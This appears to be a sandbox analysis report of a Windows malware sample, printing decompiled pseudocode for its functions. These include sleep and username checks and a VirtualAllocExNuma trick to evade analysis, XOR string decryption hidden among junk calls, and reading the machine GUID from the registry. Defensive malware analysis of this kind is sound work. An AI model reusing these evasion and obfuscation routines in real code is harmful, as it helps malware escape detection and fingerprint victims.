                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 2238633743-0
                                                                    • Opcode ID: a2d0c7020d3266b7e4a783091849d84f9ed4c48d3cd2ed840726ac96a6f100ca
                                                                    • Instruction ID: afe7283565e5c522078a5471bf4a1ea0c68b99f3e1df7f8acb02aca9803f8e8f
                                                                    • Opcode Fuzzy Hash: a2d0c7020d3266b7e4a783091849d84f9ed4c48d3cd2ed840726ac96a6f100ca
                                                                    • Instruction Fuzzy Hash: CC72B5BD401A81EFEB029F60FD498247BB6F70BB127128176E95582232D7774864EF1E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040BE94 Relevance: 61.4, APIs: 49, Instructions: 112sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E0040BE94(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* __esi;
				void* _t10;
				void* _t11;
				long _t14;
				void* _t15;

				_t15 = __eflags;
				_t12 = __edi;
				_t11 = __edx;
				_t9 = __ebx;
				Sleep(0x10); // executed
				Sleep(0x10); // executed
				Sleep(0x10);
				Sleep(0x10);
				Sleep(0x10);
				E0040107B();
				E0041899F();
				_t14 = 0x13;
				Sleep(Sleep); // executed
				Sleep(Sleep); // executed
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				E0040BE20(__ebx, _t11, __edi, _t14, _t15);
				Sleep(Sleep); // executed
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				E0040BE20(__ebx, _t11, __edi, _t14, _t15);
				Sleep(Sleep);
				Sleep(Sleep);
				E0040BE20(_t9, _t11, _t12, _t14, _t15);
				Sleep(Sleep);
				Sleep(Sleep);
				E00401000(_t10);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(Sleep);
				Sleep(_t14); // executed
				E0040B7EC(_t11, __fp0); // executed
				return 0;
			}








                                                                    0x0040be94
                                                                    0x0040be94
                                                                    0x0040be94
                                                                    0x0040be94
                                                                    0x0040be9d
                                                                    0x0040bea1
                                                                    0x0040bea5
                                                                    0x0040bea9
                                                                    0x0040bead
                                                                    0x0040beaf
                                                                    0x0040beb4
                                                                    0x0040bebb
                                                                    0x0040bebd
                                                                    0x0040bec4
                                                                    0x0040becb
                                                                    0x0040bed2
                                                                    0x0040bed9
                                                                    0x0040bee0
                                                                    0x0040bee7
                                                                    0x0040beee
                                                                    0x0040bef5
                                                                    0x0040befc
                                                                    0x0040bf03
                                                                    0x0040bf0a
                                                                    0x0040bf11
                                                                    0x0040bf18
                                                                    0x0040bf1f
                                                                    0x0040bf26
                                                                    0x0040bf2d
                                                                    0x0040bf34
                                                                    0x0040bf3a
                                                                    0x0040bf40
                                                                    0x0040bf47
                                                                    0x0040bf4e
                                                                    0x0040bf55
                                                                    0x0040bf5c
                                                                    0x0040bf63
                                                                    0x0040bf6a
                                                                    0x0040bf71
                                                                    0x0040bf78
                                                                    0x0040bf7f
                                                                    0x0040bf86
                                                                    0x0040bf8d
                                                                    0x0040bf94
                                                                    0x0040bf9b
                                                                    0x0040bfa2
                                                                    0x0040bfa9
                                                                    0x0040bfaf
                                                                    0x0040bfb5
                                                                    0x0040bfbc
                                                                    0x0040bfc2
                                                                    0x0040bfc8
                                                                    0x0040bfcf
                                                                    0x0040bfd5
                                                                    0x0040bfdb
                                                                    0x0040bfe2
                                                                    0x0040bfe9
                                                                    0x0040bff0
                                                                    0x0040bff7
                                                                    0x0040bffe
                                                                    0x0040c004
                                                                    0x0040c00c

                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000010), ref: 0040BE9D
                                                                    • Sleep.KERNELBASE(00000010), ref: 0040BEA1
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEA5
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEA9
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEAD
                                                                      • Part of subcall function 0041899F: LoadLibraryA.KERNEL32(0040BEB9), ref: 004189A5
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32(00000000,77006490), ref: 004189C6
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 004189D9
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 004189FF
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A16
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A2D
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A44
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A5B
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A72
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A89
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418AA0
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418AB7
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418ACE
                                                                      • Part of subcall function 0041899F: LoadLibraryA.KERNELBASE ref: 00418AE0
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32(00000000), ref: 00418AF6
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BEBD
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BEC4
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BECB
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BED2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BED9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEE0
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEE7
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEEE
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEF5
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEFC
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF03
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF0A
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF11
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF18
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF1F
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF26
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF2D
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF34
                                                                      • Part of subcall function 0040BE20: GetUserNameA.ADVAPI32(?,?), ref: 0040BE60
                                                                      • Part of subcall function 0040BE20: ExitProcess.KERNEL32 ref: 0040BE79
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BF40
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF47
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF4E
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF55
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF5C
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF63
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF6A
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF71
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF78
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF7F
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF86
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF8D
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF94
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF9B
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFA2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFA9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFB5
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFBC
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFC8
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFCF
                                                                      • Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401014
                                                                      • Part of subcall function 00401000: VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 0040101B
                                                                      • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 00401026
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFDB
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFE2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFE9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFF0
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFF7
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFFE
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000), ref: 0040B896
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B8D4
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B912
                                                                      • Part of subcall function 0040B7EC: OpenEventA.KERNEL32(001F0003,00000000,?,00000001,00000000), ref: 0040B951
                                                                      • Part of subcall function 0040B7EC: CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040B96B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep$AddressProc$Processlstrcat$EventExitLibraryLoad$AllocCreateCurrentNameNumaOpenUserVirtual
                                                                    • String ID:
                                                                    • API String ID: 1703151194-0
                                                                    • Opcode ID: 3122e4cef266a179cca372e35d30f7b1f5b3816ac801432eef7285d13c736a34
                                                                    • Instruction ID: 4a754e56d0df5ef1ada5544818f788e7de8f4aa0a1beda3296f1e8db3a8e38ef
                                                                    • Opcode Fuzzy Hash: 3122e4cef266a179cca372e35d30f7b1f5b3816ac801432eef7285d13c736a34
                                                                    • Instruction Fuzzy Hash: A631B8396119247BC3123FA1BC0D9CE3B29BF8B3157060965F24994071CBAC26869FEF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042604E Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 185 42604e-426060 GetModuleHandleW 186 426062-42606a call 425d9b 185->186 187 42606b-4260b3 GetProcAddress * 4 185->187 189 4260b5-4260bc 187->189 190 4260cb-4260ea 187->190 189->190 193 4260be-4260c5 189->193 191 4260ef-4260fd TlsAlloc 190->191 195 426103-42610e TlsSetValue 191->195 196 4261c4 191->196 193->190 194 4260c7-4260c9 193->194 194->190 194->191 195->196 197 426114-42615a call 42312f EncodePointer * 4 call 42785f 195->197 198 4261c6-4261c8 196->198 203 4261bf call 425d9b 197->203 204 42615c-426179 DecodePointer FlsAlloc 197->204 203->196 204->203 206 42617b-42618d call 422019 204->206 206->203 209 42618f-4261a2 DecodePointer 206->209 209->203 211 4261a4-4261bd call 425dd8 GetCurrentThreadId 209->211 211->198
                                                                    C-Code - Quality: 56%
                                                                    			E0042604E(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x4456b8 = GetProcAddress(_t35, "FlsAlloc");
					 *0x4456bc = GetProcAddress(_t35, "FlsGetValue");
					 *0x4456c0 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x4456b8;
					_t39 = TlsSetValue;
					 *0x4456c4 = _t7;
					if( *0x4456b8 == 0) {
						L6:
						 *0x4456bc = TlsGetValue;
						 *0x4456b8 = E00425D5E;
						 *0x4456c0 = _t39;
						 *0x4456c4 = TlsFree;
					} else {
						__eflags =  *0x4456bc;
						if( *0x4456bc == 0) {
							goto L6;
						} else {
							__eflags =  *0x4456c0;
							if( *0x4456c0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x443e08 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x4456bc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0042312F();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x4456b8);
							 *0x4456b8 = _t14;
							_t15 =  *_t41( *0x4456bc);
							 *0x4456bc = _t15;
							_t16 =  *_t41( *0x4456c0);
							 *0x4456c0 = _t16;
							 *0x4456c4 =  *_t41( *0x4456c4);
							_t18 = E0042785F();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00425D9B();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t20 =  *_t36( *0x4456b8, E00425F1F); // executed
								_t21 =  *_t20(); // executed
								 *0x443e04 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00422019(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x4456c0,  *0x443e04, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00425DD8(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00425D9B();
					return 0;
				}
			}






















                                                                    0x0042604e
                                                                    0x0042605c
                                                                    0x00426060
                                                                    0x00426080
                                                                    0x0042608d
                                                                    0x0042609a
                                                                    0x0042609f
                                                                    0x004260a1
                                                                    0x004260a8
                                                                    0x004260ae
                                                                    0x004260b3
                                                                    0x004260cb
                                                                    0x004260d0
                                                                    0x004260da
                                                                    0x004260e4
                                                                    0x004260ea
                                                                    0x004260b5
                                                                    0x004260b5
                                                                    0x004260bc
                                                                    0x00000000
                                                                    0x004260be
                                                                    0x004260be
                                                                    0x004260c5
                                                                    0x00000000
                                                                    0x004260c7
                                                                    0x004260c7
                                                                    0x004260c9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004260c9
                                                                    0x004260c5
                                                                    0x004260bc
                                                                    0x004260ef
                                                                    0x004260f5
                                                                    0x004260fa
                                                                    0x004260fd
                                                                    0x004261c4
                                                                    0x004261c4
                                                                    0x004261c4
                                                                    0x00426103
                                                                    0x0042610a
                                                                    0x0042610c
                                                                    0x0042610e
                                                                    0x00000000
                                                                    0x00426114
                                                                    0x00426114
                                                                    0x0042611f
                                                                    0x00426125
                                                                    0x0042612d
                                                                    0x00426132
                                                                    0x0042613a
                                                                    0x0042613f
                                                                    0x00426147
                                                                    0x0042614e
                                                                    0x00426153
                                                                    0x00426158
                                                                    0x0042615a
                                                                    0x004261bf
                                                                    0x004261bf
                                                                    0x00000000
                                                                    0x0042615c
                                                                    0x0042615c
                                                                    0x0042616d
                                                                    0x0042616f
                                                                    0x00426171
                                                                    0x00426176
                                                                    0x00426179
                                                                    0x00000000
                                                                    0x0042617b
                                                                    0x00426187
                                                                    0x0042618b
                                                                    0x0042618d
                                                                    0x00000000
                                                                    0x0042618f
                                                                    0x004261a0
                                                                    0x004261a2
                                                                    0x00000000
                                                                    0x004261a4
                                                                    0x004261a4
                                                                    0x004261a6
                                                                    0x004261a7
                                                                    0x004261ae
                                                                    0x004261b4
                                                                    0x004261b8
                                                                    0x004261bc
                                                                    0x004261bc
                                                                    0x004261a2
                                                                    0x0042618d
                                                                    0x00426179
                                                                    0x0042615a
                                                                    0x0042610e
                                                                    0x004261c8
                                                                    0x00426062
                                                                    0x00426062
                                                                    0x0042606a
                                                                    0x0042606a

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0041FE99), ref: 00426056
                                                                    • __mtterm.LIBCMT ref: 00426062
                                                                      • Part of subcall function 00425D9B: DecodePointer.KERNEL32(00000001,004261C4,?,0041FE99), ref: 00425DAC
                                                                      • Part of subcall function 00425D9B: TlsFree.KERNEL32(00000001,004261C4,?,0041FE99), ref: 00425DC6
                                                                      • Part of subcall function 00425D9B: DeleteCriticalSection.KERNEL32(00000000,00000000,774FF3A0,?,004261C4,?,0041FE99), ref: 004278C6
                                                                      • Part of subcall function 00425D9B: _free.LIBCMT ref: 004278C9
                                                                      • Part of subcall function 00425D9B: DeleteCriticalSection.KERNEL32(00000001,774FF3A0,?,004261C4,?,0041FE99), ref: 004278F0
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00426078
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00426085
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00426092
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042609F
                                                                    • TlsAlloc.KERNEL32(?,0041FE99), ref: 004260EF
                                                                    • TlsSetValue.KERNEL32(00000000,?,0041FE99), ref: 0042610A
                                                                    • __init_pointers.LIBCMT ref: 00426114
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 00426125
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 00426132
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 0042613F
                                                                    • EncodePointer.KERNEL32(?,0041FE99), ref: 0042614C
                                                                    • DecodePointer.KERNEL32(00425F1F,?,0041FE99), ref: 0042616D
                                                                    • FlsAlloc.KERNELBASE(?,0041FE99), ref: 0042616F
                                                                    • __calloc_crt.LIBCMT ref: 00426182
                                                                    • DecodePointer.KERNEL32(00000000,?,0041FE99), ref: 0042619C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004261AE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$AddressEncodeProc$Decode$AllocCriticalDeleteSection$CurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                    • API String ID: 2049299755-3819984048
                                                                    • Opcode ID: eaf2ec353364d3fe878370668dce47b94f073f868bcb46f059ee4771291e831c
                                                                    • Instruction ID: 744ca1279e82553ca8085ef17d5a5dafa6ec7a62595825729dc96fbaf7f0594e
                                                                    • Opcode Fuzzy Hash: eaf2ec353364d3fe878370668dce47b94f073f868bcb46f059ee4771291e831c
                                                                    • Instruction Fuzzy Hash: 8231A239A06B319BDB11AF75BC0861A7AB4EB06320B93413BE418C72F2D7799440CF9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403B11 Relevance: 25.6, APIs: 17, Instructions: 133stringmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 398 403b11-403b39 399 403b3c-403b41 398->399 399->399 400 403b43-403ba8 lstrcatA * 3 LocalAlloc lstrcatA * 6 399->400 401 403c11-403c30 lstrcatA * 3 400->401 402 403baa-403bb3 400->402 404 403c31-403c36 401->404 403 403bb6-403bd1 lstrcatA * 2 402->403 405 403bd3-403bdd 403->405 406 403bdf-403c0f lstrcatA * 2 403->406 404->404 407 403c38-403c4f call 41da9b 404->407 405->405 405->406 406->401 406->403
                                                                    C-Code - Quality: 90%
                                                                    			E00403B11(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				char* _t54;
				void* _t62;
				char* _t82;
				char* _t91;
				intOrPtr _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				CHAR* _t117;
				void* _t118;
				void* _t121;
				signed int _t122;
				void* _t124;

				_t122 = _t124 - 0x37c;
				_t52 =  *0x443674; // 0x393162b1
				 *(_t122 + 0x378) = _t52 ^ _t122;
				_t103 = __ecx;
				 *((intOrPtr*)(_t122 - 0x7c)) = __ecx;
				_t107 = 0x3e8;
				_t54 = _t122 - 0x70;
				do {
					 *_t54 = 0;
					_t54 = _t54 + 1;
					_t107 = _t107 - 1;
				} while (_t107 != 0);
				_t117 = "0";
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				_t8 = _t103 + 1; // 0x8
				_t62 = LocalAlloc(0x40, _t8); // executed
				 *(_t122 - 0x74) = _t62;
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				 *((char*)(_t103 +  *(_t122 - 0x74))) = 0;
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				_t104 = 0;
				if( *((intOrPtr*)(_t122 - 0x7c)) > 0) {
					 *((intOrPtr*)(_t122 - 0x80)) =  *((intOrPtr*)(_t122 + 0x384)) -  *(_t122 - 0x74);
					do {
						lstrcatA(_t122 - 0x70, _t117);
						lstrcatA(_t122 - 0x70, _t117);
						_t91 =  *((intOrPtr*)(_t122 + 0x388));
						 *(_t122 - 0x78) =  *(_t122 - 0x78) & 0x00000000;
						if( *_t91 != 0) {
							do {
								 *(_t122 - 0x78) =  *(_t122 - 0x78) + 1;
							} while ( *((char*)( *(_t122 - 0x78) + _t91)) != 0);
						}
						_t113 =  *((intOrPtr*)(_t122 - 0x80));
						 *( *(_t122 - 0x74) + _t104) =  *(_t104 %  *(_t122 - 0x78) +  *((intOrPtr*)(_t122 + 0x388))) ^  *( *((intOrPtr*)(_t122 - 0x80)) +  *(_t122 - 0x74) + _t104);
						lstrcatA(_t122 - 0x70, _t117);
						lstrcatA(_t122 - 0x70, _t117);
						_t104 = _t104 + 1;
					} while (_t104 <  *((intOrPtr*)(_t122 - 0x7c)));
				}
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				lstrcatA(_t122 - 0x70, _t117);
				_pop(_t118);
				_pop(_t121);
				_t108 = 0x3e8;
				_t82 = _t122 - 0x70;
				_pop(_t105);
				do {
					 *_t82 = 0;
					_t82 = _t82 + 1;
					_t108 = _t108 - 1;
				} while (_t108 != 0);
				return E0041DA9B( *(_t122 - 0x74), _t105,  *(_t122 + 0x378) ^ _t122, _t113, _t118, _t121);
			}





















                                                                    0x00403b12
                                                                    0x00403b1f
                                                                    0x00403b26
                                                                    0x00403b2d
                                                                    0x00403b31
                                                                    0x00403b34
                                                                    0x00403b39
                                                                    0x00403b3c
                                                                    0x00403b3c
                                                                    0x00403b3f
                                                                    0x00403b40
                                                                    0x00403b40
                                                                    0x00403b49
                                                                    0x00403b53
                                                                    0x00403b5a
                                                                    0x00403b61
                                                                    0x00403b63
                                                                    0x00403b69
                                                                    0x00403b6f
                                                                    0x00403b77
                                                                    0x00403b7e
                                                                    0x00403b85
                                                                    0x00403b8a
                                                                    0x00403b93
                                                                    0x00403b9a
                                                                    0x00403ba1
                                                                    0x00403ba3
                                                                    0x00403ba8
                                                                    0x00403bb3
                                                                    0x00403bb6
                                                                    0x00403bbb
                                                                    0x00403bc2
                                                                    0x00403bc4
                                                                    0x00403bca
                                                                    0x00403bd1
                                                                    0x00403bd3
                                                                    0x00403bd3
                                                                    0x00403bd9
                                                                    0x00403bd3
                                                                    0x00403bf6
                                                                    0x00403bfc
                                                                    0x00403c02
                                                                    0x00403c09
                                                                    0x00403c0b
                                                                    0x00403c0c
                                                                    0x00403bb6
                                                                    0x00403c16
                                                                    0x00403c1d
                                                                    0x00403c24
                                                                    0x00403c26
                                                                    0x00403c27
                                                                    0x00403c28
                                                                    0x00403c2d
                                                                    0x00403c30
                                                                    0x00403c31
                                                                    0x00403c31
                                                                    0x00403c34
                                                                    0x00403c35
                                                                    0x00403c35
                                                                    0x00403c4f

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B53
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B5A
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B61
                                                                    • LocalAlloc.KERNELBASE(00000040,00000008,?,00000007,00000000), ref: 00403B69
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B77
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B7E
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B85
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B93
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403B9A
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BA1
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BBB
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403BC2
                                                                    • lstrcatA.KERNEL32(?,00438004,?,?,00000007,00000000), ref: 00403C02
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C09
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C16
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C1D
                                                                    • lstrcatA.KERNEL32(?,00438004,?,00000007,00000000), ref: 00403C24
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$AllocLocal
                                                                    • String ID:
                                                                    • API String ID: 261761639-0
                                                                    • Opcode ID: de30f387f0656726e9e2ca8b6a03cb3c803097872c202a071c6bfc1cfc492af0
                                                                    • Instruction ID: 6d1da84e237de8b004baa24fc1609612b2894461fc9f2fc3fe60c2543eb253fe
                                                                    • Opcode Fuzzy Hash: de30f387f0656726e9e2ca8b6a03cb3c803097872c202a071c6bfc1cfc492af0
                                                                    • Instruction Fuzzy Hash: BC412DB6D0025C9BDB31DBF9DC84AEEBBBCBB49600F24012EA905E7146D6349605CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041537D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 57registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 88%
                                                                    			E0041537D(void* __edi, char* __esi) {
				void* __ebx;
				signed int _t18;
				long _t23;
				void* _t37;
				void* _t41;
				void* _t42;
				char* _t43;
				signed int _t44;
				void* _t46;

				_t43 = __esi;
				_t42 = __edi;
				_t44 = _t46 - 0x18c;
				_t18 =  *0x443674; // 0x393162b1
				 *(_t44 + 0x188) = _t18 ^ _t44;
				 *(_t44 - 0x7c) = 0;
				 *(_t44 - 0x7c) = 0xff;
				 *(_t44 + 0x88) = 0;
				E00426300(_t44 + 0x89, 0, 0xfe);
				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119, _t44 - 0x80); // executed
				if(_t23 == 0) {
					RegQueryValueExA( *(_t44 - 0x80), "MachineGuid", 0, 0, _t44 + 0x88, _t44 - 0x7c); // executed
				}
				RegCloseKey( *(_t44 - 0x80));
				CharToOemA(_t44 + 0x88, _t44 - 0x78);
				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t43 + 0x10)) = 0;
				 *_t43 = 0;
				E00404331(_t43, _t44 - 0x78);
				_pop(_t37);
